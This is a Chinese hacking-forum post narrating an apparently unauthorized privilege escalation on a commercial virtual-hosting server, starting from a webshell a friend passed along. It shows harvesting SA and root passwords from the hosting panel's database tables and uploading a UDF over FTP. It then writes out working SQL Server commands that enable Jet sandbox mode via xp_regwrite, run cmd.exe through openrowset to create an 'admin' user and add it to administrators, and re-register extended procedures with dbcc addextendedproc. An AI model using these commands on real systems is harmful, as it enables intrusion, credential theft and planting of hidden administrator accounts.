热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

记星外主机提权的曲折过程

发布时间:2010-11-19 10:33文章来源:T00LS文章作者:天使之翼 点击次数:
摘要:BY:天使之翼 BLOG:http://hi.baidu.com/hack078 t00ls首发 今天朋友丢了个星外主站的SHELL过来 不知他是怎么搞的,权限都设置得都NB 什么组件都删光光了,只支持ASP 汗的是全部没写入和修改权限,都不知道那Y是怎么拿到SHELL的 不光是这样,他的马都有点问题,使...

BY:天使之翼
BLOG:http://hi.baidu.com/hack078


t00ls首发
今天朋友丢了个星外主站的SHELL过来
不知他是怎么搞的,权限都设置得都NB 什么组件都删光光了,只支持ASP 汗的是全部没写入和修改权限,都不知道那Y是怎么拿到SHELL的
不光是这样,他的马都有点问题,使用起来都不爽,
还好,在Global.asa 找到了数据库连接文件 ,不是SA   不过密码和SA的一样   本想可以直接提权了,没想什么组件都删了,而且用这个SHELL不习惯
又执行不了命令,SHELL也没写入修改权限,,头大,, 之后直接用SHELL自带的SQL连接一下
看看里面的表什么的,查了查
SELECT * FROM [FreeHost_Serversqllist]
这个表得到一些数据
1.JPG


他所有服务器的SA ROOT账号 包含本机的,这下好了,,,有戏,不过高兴了早一点,,,接着想UDF提权,不过没写入权限,晕
怎么办,想了想,查他上机开通的主机看看,说不定他不是独立服务器,,
SELECT * FROM [FreeHost_Product_Host]
2.JPG


看了一下   站不多,只有300多个   仔细的找一下,,找到同服务器的   这下好了,星外主目录没写权限,我直接从FTP下手,,找了个站   用FTP传了UDF上去   本以为就此搞定,结果郁闷了一下     UDF不能导出  
我想应该是降权了 在群里问了一下,,好你星外的权限配置得比较BT   没办法了
搞了1个多小时   ,没搞下郁闷
其实是我走了弯路了   回想下   记得可以用SA沙盘提权
就接着试   不过什么xp_cmdshell等组件都删了
头疼   百度YY一下找到了恢复XP_cmdshell的,不过执行一下不成功   不知道为什么,,后来才发现是马的问题  
沙盘就没去看了, 不过百度找到一个新方法


SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

http://www.4shell.org/archives/242.html

在这种情况下,要执行命令,条件是要有xp_regwrite。

首先开启沙盘模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators admin /add")')


试了下不成   在找到
dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')

恢复了一下,,,成功了 这样提权成功
不过失误了一下 在加管理组的时候
写错一点命令   以为他管理级改了,,忙活半天   才发现  

本人文采不好,,,,写了半天发现上面的文字YY的我看得都头大了  
http://www.4shell.org/archives/242.html
http://www.4shell.org/archives/1718.html
这是找到的两篇文章   希望对大家有用了,
秀下成果吧

3.JPG

标签分类: 入侵提权

上一篇:搜狗输入法0day漏洞获取系统权限
下一篇:SA权限沙合模式提权方法